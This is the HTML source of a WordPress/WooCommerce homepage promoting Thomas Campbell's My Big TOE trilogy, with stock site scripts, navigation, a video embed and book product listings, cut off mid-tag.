href='//code.jquery.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="My Big Toe &raquo; Feed" href="https://www.my-big-toe.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="My Big Toe &raquo; Comments Feed" href="https://www.my-big-toe.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="My Big Toe &raquo; Home Comments Feed" href="https://www.my-big-toe.com/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.my-big-toe.com\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.my-big-toe.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wc-block-style-css' href='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='srzmpcss-css' href='https://www.my-big-toe.com/wp-content/plugins/srizon-youtube-album-pro/css/mag-popup.css' type='text/css' media='all' /> <link rel='stylesheet' id='srzytstyles-css' href='https://www.my-big-toe.com/wp-content/plugins/srizon-youtube-album-pro/css/srzytstyles.css' type='text/css' media='all' /> <link rel='stylesheet' id='elastislidecss-css' href='https://www.my-big-toe.com/wp-content/plugins/srizon-youtube-album-pro/css/elastislide.css' type='text/css' media='all' /> <link rel='stylesheet' id='wpmenucart-icons-css' href='https://www.my-big-toe.com/wp-content/plugins/woocommerce-menu-bar-cart/css/wpmenucart-icons.css' type='text/css' media='all' /> <link rel='stylesheet' id='wpmenucart-fontawesome-css' href='https://www.my-big-toe.com/wp-content/plugins/woocommerce-menu-bar-cart/css/wpmenucart-fontawesome.css' type='text/css' media='all' /> <link rel='stylesheet' id='wpmenucart-css' href='https://www.my-big-toe.com/wp-content/plugins/woocommerce-menu-bar-cart/css/wpmenucart-main.css' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css' type='text/css' media='all' /> <style id='woocommerce-layout-inline-css' type='text/css'> .infinite-scroll .woocommerce-pagination { display: none; } </style> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://www.my-big-toe.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='bootstrap-css-css' href='//maxcdn.bootstrapcdn.com/bootstrap/3.3.1/css/bootstrap.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='fa-css-css' href='//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='fa-youmax-css' href='https://www.my-big-toe.com/wp-content/uploads/youmax2-mirror/youmax.css' type='text/css' media='all' /> <link rel='stylesheet' id='mybigtoe-style-css' href='https://www.my-big-toe.com/wp-content/themes/mybigtoe/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='__EPYT__style-css' href='https://www.my-big-toe.com/wp-content/plugins/youtube-embed-plus/styles/ytprefs.min.css' type='text/css' media='all' /> <style id='__EPYT__style-inline-css' type='text/css'> .epyt-gallery-thumb { width: 33.333%; } </style> <link rel='stylesheet' id='jetpack_css-css' href='https://www.my-big-toe.com/wp-content/plugins/jetpack/css/jetpack.css' type='text/css' media='all' /> <script>var jquery_placeholder_url = 'https://www.my-big-toe.com/wp-content/plugins/gravity-forms-placeholders/jquery.placeholder-1.0.1.js';</script><script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/srizon-youtube-album-pro/js/modernizr.js'></script> <script type='text/javascript' src='https://code.jquery.com/jquery-1.11.3.min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/srizon-youtube-album-pro/js/mag-popup.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/srizon-youtube-album-pro/js/elastislide.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpmenucart_ajax_assist = {"shop_plugin":"woocommerce","always_display":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/woocommerce-menu-bar-cart/javascript/wpmenucart-ajax-assist.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var _EPYT_ = {"ajaxurl":"https:\/\/www.my-big-toe.com\/wp-admin\/admin-ajax.php","security":"42238911f9","gallery_scrolloffset":"20","eppathtoscripts":"https:\/\/www.my-big-toe.com\/wp-content\/plugins\/youtube-embed-plus\/scripts\/","eppath":"https:\/\/www.my-big-toe.com\/wp-content\/plugins\/youtube-embed-plus\/","epresponsiveselector":"[\"iframe.__youtube_prefs_widget__\"]","epdovol":"1","version":"13.1","evselector":"iframe.__youtube_prefs__[src], iframe[src*=\"youtube.com\/embed\/\"], iframe[src*=\"youtube-nocookie.com\/embed\/\"]","ajax_compat":"","ytapi_load":"light","stopMobileBuffer":"1","vi_active":"","vi_js_posttypes":[]}; /* ]]> */ </script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/youtube-embed-plus/scripts/ytprefs.min.js'></script> <script type='text/javascript' src='https://www.my-big-toe.com/wp-content/plugins/gravity-forms-placeholders/gf.placeholders.js'></script> <link rel='https://api.w.org/' href='https://www.my-big-toe.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.my-big-toe.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.my-big-toe.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <meta name="generator" content="WooCommerce 3.6.2" /> <link rel='shortlink' href='https://wp.me/P5qTg0-4' /> <link rel="alternate" type="application/json+oembed" href="https://www.my-big-toe.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.my-big-toe.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.my-big-toe.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.my-big-toe.com%2F&#038;format=xml" /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//jetpack.wordpress.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//s1.wp.com'/> <link rel='dns-prefetch' href='//s2.wp.com'/> <link rel='dns-prefetch' href='//public-api.wordpress.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <style type='text/css'>img#wpstats{display:none}</style> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <script async src='https://stats.wp.com/s-201920.js'></script> <script type="text/javascript">var _gaq=_gaq||[];_gaq.push(['_trackPageview']);(function(){var ga=document.createElement('script');ga.type='text/javascript';ga.async=true;ga.src='http://www.google-analytics.com/ga.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ga,s);})();</script> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> </head> <body class="home page-template page-template-page-home page-template-page-home-php page page-id-4 woocommerce-no-js"> <header class="header" role="banner"> <nav class="navbar navbar-default navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <!-- You'll want to use a responsive image option so this logo looks good on devices - I recommend using something like retina.js (do a quick Google search for it and you'll find it) --> <a class="navbar-brand" href="https://www.my-big-toe.com/" rel="home"><img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/logo-dark.png" alt="" class="visible-lg-block"><img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/icon-logo.png" alt="" class="hidden-lg"></a> </div> <!-- Collect the nav links, forms, and other content for toggling --> <nav class="collapse navbar-collapse navbar-ex1-collapse"><ul id="menu-main-menu" class="nav navbar-nav navbar-right"><li id="menu-item-6" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-4 current_page_item menu-item-6"><a href="https://www.my-big-toe.com/" aria-current="page">Home</a></li> <li id="menu-item-137" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-137"><a href="https://www.my-big-toe.com/about/">About</a></li> <li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9"><a href="/media/">Media</a></li> <li id="menu-item-10" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-10"><a href="/store1">Store</a> <ul class="sub-menu"> <li id="menu-item-142" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-142"><a href="https://www.my-big-toe.com/product-category/paperback-books/">Paperback Books</a></li> <li id="menu-item-141" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-141"><a href="https://www.my-big-toe.com/product-category/hardback-books/">Hardback Books</a></li> <li id="menu-item-389" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-389"><a href="http://www.mbtevents.com/store.html">DVD&#8217;s &#038; Binaural Beats</a></li> <li id="menu-item-140" class="menu-item menu-item-type-taxonomy menu-item-object-product_cat menu-item-140"><a href="https://www.my-big-toe.com/product-category/reseller-payment/">Payments &#038; Donations</a></li> </ul> </li> <li id="menu-item-11" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-11"><a target="_blank" href="https://www.mbtevents.com/">Events</a> <ul class="sub-menu"> <li id="menu-item-704" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-704"><a href="https://www.my-big-toe.com/kickstarter/">Kickstarter</a></li> </ul> </li> <li id="menu-item-12" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12"><a target="_blank" href="https://wiki.my-big-toe.com/index.php/Main_Page">Wiki</a></li> <li id="menu-item-13" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13"><a target="_blank" href="/forums/index.php">Forum</a></li> <li id="menu-item-396" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-396"><a href="https://www.my-big-toe.com/downloads/">Downloads</a> <ul class="sub-menu"> <li id="menu-item-241" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-241"><a href="https://www.my-big-toe.com/workshop-gems/">Workshop Slides and Gems</a></li> <li id="menu-item-397" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-397"><a href="http://www.my-big-toe.com/uploads/MBT%20Figures%20and%20Equations.pdf">Figures &#038; Equations</a></li> </ul> </li> <li id="menu-item-324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-324"><a href="https://www.my-big-toe.com/contact/">Contact</a> <ul class="sub-menu"> <li id="menu-item-420" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-420"><a href="https://www.my-big-toe.com/customer-service/">Customer Service</a></li> </ul> </li> <li class="wpmenucartli wpmenucart-display-standard menu-item" id="wpmenucartli"><a class="wpmenucart-contents empty-wpmenucart" style="display:none">&nbsp;</a></li></ul></nav><!-- #site-navigation --> </div><!-- /.container --> </nav> <div class="hero"> <div class="video-container"> <video class="bg-video" preload="auto" muted loop="" autoplay="" height="100%" width="100%"><source src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/hero.mp4" type="video/mp4"></video> </div> <div class="container"> <div class="row"> <div class="col-md-7 pull-right js-animate-right"> <h2>Thomas Campbell</h2> <div class="tagline"> Physicist, Author <br> and <br> Expert on Consciousness </div> <div class="up"></div> <a href="https://www.my-big-toe.com/store1/" class="button button-cta"> Buy Books </a> </div> <div class="col-md-5 js-animate-left"> <img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/bill-image.png" alt="" class="hero-image"> </div> </div> </div> </div> </header> <section class="section-wrap"> <div class="container"> <div class="row"> <div class="col-md-5 pull-right js-animate-right text-center"> <img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/tom-atom.png" alt="" class="toe"> </div> <div class="col-md-6 js-animate-left col-md-offset-1"> <h2>Thomas Campbell</h2> <!-- Edit: Added link to slides - Author Andrew Trismen, [email protected] --> <!-- Edit 2-4-2017: Moved link and lead in text to new paragraph - Author: Andrew Trismen, [email protected] --> <p>Physicist, consciousness researcher, author of the My Big TOE trilogy and international lecturer, describes the nature of our larger reality, provides a complete theory of consciousness, and explains our purpose and connection to that larger reality. Along the way, Campbell derives a more fundamental science that directly answers the most pressing problems and paradoxes of modern physics.</p> <p>The slides that Tom used during his physics experiments presentation at the MBT LA event in October 2016 can be viewed and downloaded <a href=http://www.my-big-toe.com/wp-content/uploads/MBT-LA-Physics-Experiments.pdf target="_blank">here</a>.</p> <a href="https://www.my-big-toe.com/about/" class="button button-cta lowercase">Read More</a> </div> </div> </div> </section> <section class="section-wrap dark media-wrap"> <div class="container"> <div class="row"> <div class="col-md-6 js-animate-right pull-right"> <h2>Tom's Latest Videos</h2> <p>If you have a logical, open, and inquisitive mind, an attitude of scientific pragmatism that appreciates the elegance of fundamental truth and the thrill of breakthrough, you will enjoy this journey of personal and scientific discovery.</p> <a href="https://www.my-big-toe.com/media/" class="button button-cta lowercase">More Videos</a> </div> <div class="col-md-6 js-animate-left"> <!-- Edit 2-4-2017: Update embedded video to MBT LA pt 1 - Author: Andrew Trismen, [email protected] --> <div class="flex-video widescreen" id="video-player"> <iframe width="300" height="200" src="https://www.youtube.com/embed/uEuOGCEmiTg" frameborder="0" allowfullscreen></iframe> </div> </div> </div> </div> </section> <section class="section-wrap"> <div class="container"> <div class="row"> <div class="col-md-5 text-center pull-right js-animate-right"> <img src="https://www.my-big-toe.com/wp-content/themes/mybigtoe/images/toe.png" alt="" class="img-t"> </div> <div class="col-md-6 col-md-offset-1 js-animate-left"> <h2>Events and Speaking Engagements</h2> <p>Interested in upcoming workshops and lectures or in having Thomas Campbell give a workshop or lecture in your area? Want to get involved? </p> <a href="https://www.my-big-toe.com/events/" class="button button-cta lowercase">Enter Here</a> </div> </div> </div> </section> <section class="section-wrap dark text-center products"> <div class="container"> <div class="row"> <div class="col-md-12"> <h2 class="text-center">Products</h2> </div> <div class="flexslider"> <ul class="slides"> <li class="slide"> <div class="row"> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/entire-trilogy-3-book-set-hardback/"><img width="285" height="263" src="https://www.my-big-toe.com/wp-content/uploads/2015/02/1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" /></a> </figure> <span class="title">Entire Trilogy: 3 book set (Hardback)</span> <span class="price">$48.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>48.50</span><a href="/?add-to-cart=113" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="113" data-product_sku="Trilogy 3BSH" aria-label="Add &ldquo;Entire Trilogy: 3 book set (Hardback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/book-2-discovery-paperback/"><img width="350" height="350" src="https://www.my-big-toe.com/wp-content/uploads/2015/02/2.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2015/02/2.jpg 350w, https://www.my-big-toe.com/wp-content/uploads/2015/02/2-150x150.jpg 150w, https://www.my-big-toe.com/wp-content/uploads/2015/02/2-300x300.jpg 300w, https://www.my-big-toe.com/wp-content/uploads/2015/02/2-90x90.jpg 90w" sizes="(max-width: 350px) 100vw, 350px" /></a> </figure> <span class="title">Book 2: Discovery (Paperback)</span> <span class="price">$16.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>16.50</span><a href="/?add-to-cart=115" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="115" data-product_sku="Discovery PB" aria-label="Add &ldquo;Book 2: Discovery (Paperback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/book-3-inner-workings-hardback/"><img width="350" height="350" src="https://www.my-big-toe.com/wp-content/uploads/2015/02/350x350xInner350.jpg.pagespeed.ic_.fyY4lvqrju.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2015/02/350x350xInner350.jpg.pagespeed.ic_.fyY4lvqrju.jpg 350w, https://www.my-big-toe.com/wp-content/uploads/2015/02/350x350xInner350.jpg.pagespeed.ic_.fyY4lvqrju-150x150.jpg 150w, https://www.my-big-toe.com/wp-content/uploads/2015/02/350x350xInner350.jpg.pagespeed.ic_.fyY4lvqrju-300x300.jpg 300w, https://www.my-big-toe.com/wp-content/uploads/2015/02/350x350xInner350.jpg.pagespeed.ic_.fyY4lvqrju-90x90.jpg 90w" sizes="(max-width: 350px) 100vw, 350px" /></a> </figure> <span class="title">Book 3: Inner Workings (Hardback)</span> <span class="price">$22.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>22.50</span><a href="/?add-to-cart=111" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="111" data-product_sku="Inner HB" aria-label="Add &ldquo;Book 3: Inner Workings (Hardback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> </div></li> <!--/.wrap--> <li class="slide"> <div class="row"> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/book-2-discovery-hardback/"><img width="350" height="350" src="https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xDiscover350.jpg.pagespeed.ic_.OKEMG_iKHK.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xDiscover350.jpg.pagespeed.ic_.OKEMG_iKHK.jpg 350w, https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xDiscover350.jpg.pagespeed.ic_.OKEMG_iKHK-150x150.jpg 150w, https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xDiscover350.jpg.pagespeed.ic_.OKEMG_iKHK-300x300.jpg 300w, https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xDiscover350.jpg.pagespeed.ic_.OKEMG_iKHK-90x90.jpg 90w" sizes="(max-width: 350px) 100vw, 350px" /></a> </figure> <span class="title">Book 2: Discovery (Hardback)</span> <span class="price">$25.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>25.50</span><a href="/?add-to-cart=49" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="49" data-product_sku="Discovery HB" aria-label="Add &ldquo;Book 2: Discovery (Hardback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/entire-trilogy-3-book-set-paperback/"><img width="230" height="362" src="https://www.my-big-toe.com/wp-content/uploads/2015/04/Three-book-Set.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2015/04/Three-book-Set.jpg 230w, https://www.my-big-toe.com/wp-content/uploads/2015/04/Three-book-Set-190x300.jpg 190w" sizes="(max-width: 230px) 100vw, 230px" /></a> </figure> <span class="title">Entire Trilogy: 3 book set (Paperback)</span> <span class="price">$33.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>33.50</span><a href="/?add-to-cart=224" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="224" data-product_sku="Trilogy 3BSP" aria-label="Add &ldquo;Entire Trilogy: 3 book set (Paperback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/book-3-inner-workings-paperback/"><img width="350" height="350" src="https://www.my-big-toe.com/wp-content/uploads/2015/02/3.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2015/02/3.jpg 350w, https://www.my-big-toe.com/wp-content/uploads/2015/02/3-150x150.jpg 150w, https://www.my-big-toe.com/wp-content/uploads/2015/02/3-300x300.jpg 300w, https://www.my-big-toe.com/wp-content/uploads/2015/02/3-90x90.jpg 90w" sizes="(max-width: 350px) 100vw, 350px" /></a> </figure> <span class="title">Book 3: Inner Workings (Paperback)</span> <span class="price">$14.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>14.50</span><a href="/?add-to-cart=117" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="117" data-product_sku="Inner PB" aria-label="Add &ldquo;Book 3: Inner Workings (Paperback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> </div></li> <!--/.wrap--> <li class="slide"> <div class="row"> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/book-1-awakening-hardback/"><img width="350" height="350" src="https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xAwake350.jpg.pagespeed.ic_.zIGpipr7Vo.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xAwake350.jpg.pagespeed.ic_.zIGpipr7Vo.jpg 350w, https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xAwake350.jpg.pagespeed.ic_.zIGpipr7Vo-150x150.jpg 150w, https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xAwake350.jpg.pagespeed.ic_.zIGpipr7Vo-300x300.jpg 300w, https://www.my-big-toe.com/wp-content/uploads/2014/12/350x350xAwake350.jpg.pagespeed.ic_.zIGpipr7Vo-90x90.jpg 90w" sizes="(max-width: 350px) 100vw, 350px" /></a> </figure> <span class="title">Book 1: Awakening (Hardback)</span> <span class="price">$23.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>23.50</span><a href="/?add-to-cart=47" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="47" data-product_sku="Awakening HB" aria-label="Add &ldquo;Book 1: Awakening (Hardback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/complete-trilogy-3-books-one-binding-hardback/"><img width="2000" height="1856" src="https://www.my-big-toe.com/wp-content/uploads/2015/04/Tril-Cover-for-web.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2015/04/Tril-Cover-for-web.jpg 2000w, https://www.my-big-toe.com/wp-content/uploads/2015/04/Tril-Cover-for-web-300x278.jpg 300w, https://www.my-big-toe.com/wp-content/uploads/2015/04/Tril-Cover-for-web-1024x950.jpg 1024w" sizes="(max-width: 2000px) 100vw, 2000px" /></a> </figure> <span class="title">Complete Trilogy: 3 books in one binding (Hardback)</span> <span class="price">$34.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>34.50</span><a href="/?add-to-cart=221" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="221" data-product_sku="Trilogy AI1H" aria-label="Add &ldquo;Complete Trilogy: 3 books in one binding (Hardback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/entire-trilogy-3-books-one-binding-paperback/"><img width="2000" height="1856" src="https://www.my-big-toe.com/wp-content/uploads/2015/02/4.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2015/02/4.jpg 2000w, https://www.my-big-toe.com/wp-content/uploads/2015/02/4-300x278.jpg 300w, https://www.my-big-toe.com/wp-content/uploads/2015/02/4-1024x950.jpg 1024w" sizes="(max-width: 2000px) 100vw, 2000px" /></a> </figure> <span class="title">Entire Trilogy: 3 books in one binding (Paperback)</span> <span class="price">$25.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>25.50</span><a href="/?add-to-cart=119" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="119" data-product_sku="Trilogy AI1P" aria-label="Add &ldquo;Entire Trilogy: 3 books in one binding (Paperback)&rdquo; to your cart" rel="nofollow">Add to cart</a></p> </div> </div> </div></li> <!--/.wrap--> <li class="slide"> <div class="row"> <div class="col-md-4"> <div class="product-container"> <figure> <a href="https://www.my-big-toe.com/store1/book-1-awakening-paperback/"><img width="350" height="350" src="https://www.my-big-toe.com/wp-content/uploads/2015/04/1.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.my-big-toe.com/wp-content/uploads/2015/04/1.jpg 350w, https://www.my-big-toe.com/wp-content/uploads/2015/04/1-150x150.jpg 150w, https://www.my-big-toe.com/wp-content/uploads/2015/04/1-300x300.jpg 300w, https://www.my-big-toe.com/wp-content/uploads/2015/04/1-90x90.jpg 90w" sizes="(max-width: 350px) 100vw, 350px" /></a> </figure> <span class="title">Book 1: Awakening (Paperback)</span> <span class="price">$15.50</span> </div> <div class="clear"></div> <div class="btn-prod-wrap"> <p class="product woocommerce add_to_cart_inline " style="border:4px solid #ccc; padding: 12px;"><span class="woocommerce-Price-amount amount"><span 